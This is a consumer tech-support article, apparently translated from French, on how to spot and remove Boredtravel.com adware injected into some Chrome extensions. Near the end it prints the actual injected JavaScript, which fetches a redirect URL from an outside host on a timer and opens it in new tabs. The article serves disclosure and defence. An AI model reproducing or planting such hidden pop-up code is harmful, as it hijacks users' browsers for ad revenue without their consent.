An adware that opens pop-ups to Boredtravel.com has slipped into some Chrome extensions. Here's how to spot and remove this virus.
Identify and remove Boredtravel.com adware
A malicious script has been inserted in the latest update of several Chrome extensions. This script opens the site Boredtravel.com without the knowledge of the users, at regular intervals of time. The extensions infected by this script are Lyrics Fetcher and Remind Me, from the helpfulwebtech developer.
This adware is not dangerous in that it only opens an advertising page. It is nevertheless disturbing to let this dubious practice occur.
Identify the adware
To identify the adware, just analyze the behavior of your browser:
- Close Google Chrome and restart it.
- Wait 6 minutes after opening the browser. If your browser is infected, a tab will open on the boredtravel.com page after exactly 6 minutes. This will also happen every 4 hours
Delete adware
The removal is simple and fast:
- Check your Chrome extensions: If one or more of the extensions listed above are installed, then your browser is probably infected.
- To remove this adware, simply disable or remove the extensions in question.
Cases have been identified for extensions Lyrics Fetcher and Remind Me, but they may not be the only ones. It is possible the adware is also present on the extension Baby Mode, an extension of the same developer.
It is unclear whether the developer of this extension deliberately added the malicious script, or if it was done by a hacker. As a precaution, we recommend that you disable or remove all extensions from this developer.
The extensions have been reported to Google, we will know more soon. If other extensions have the same concern, do not hesitate to let us know.
Replace extensions
Here are some alternative extensions:
- Lyrics Fetcher can be replaced by Lyrics Here by Rob W or Auto Lyric Show
- Remind Me can be replaced by Pi Reminder
The work of Boredtravel.com
The principle is simple, the developer or a hacker has added a script in the concerned extensions. This script, which runs in the background, instructs the browser to open an advertising page at regular intervals. The goal for the developer or hacker is that the landing page is opened a number of times. This allows to increase the number of views of the site Boredtravel.com and increase the related income.
Here is the code that has been added in the extension. I added green comments so you understand better
<script>
// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
setTimeout(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
/* cette URL génère un lien du type
https://ourshort.com/?g/BNHzHJJ */
async: false,
dataType: 'json',
success: function (data) {
//ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
intervalWebsite() /* appel de la fonction qui ouvre
un pop-up toutes les 4 heures */
}
});
}, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min
// fonction qui ouvre un pop-up toutes les 4 heures
function intervalWebsite() {
setInterval(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
// comme dans la première fonction
async: false,
dataType: 'json',
success: function (data) {
// comme dans la première fonction
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
}
});
}, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
}
</script>
Sources: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/
Also read: Enable dual authentication on your online accounts (2FA) https://currenttrends.fr/internet/2fa-double-authentification/
I have this problem but I do not know any of the extensions you mentioned.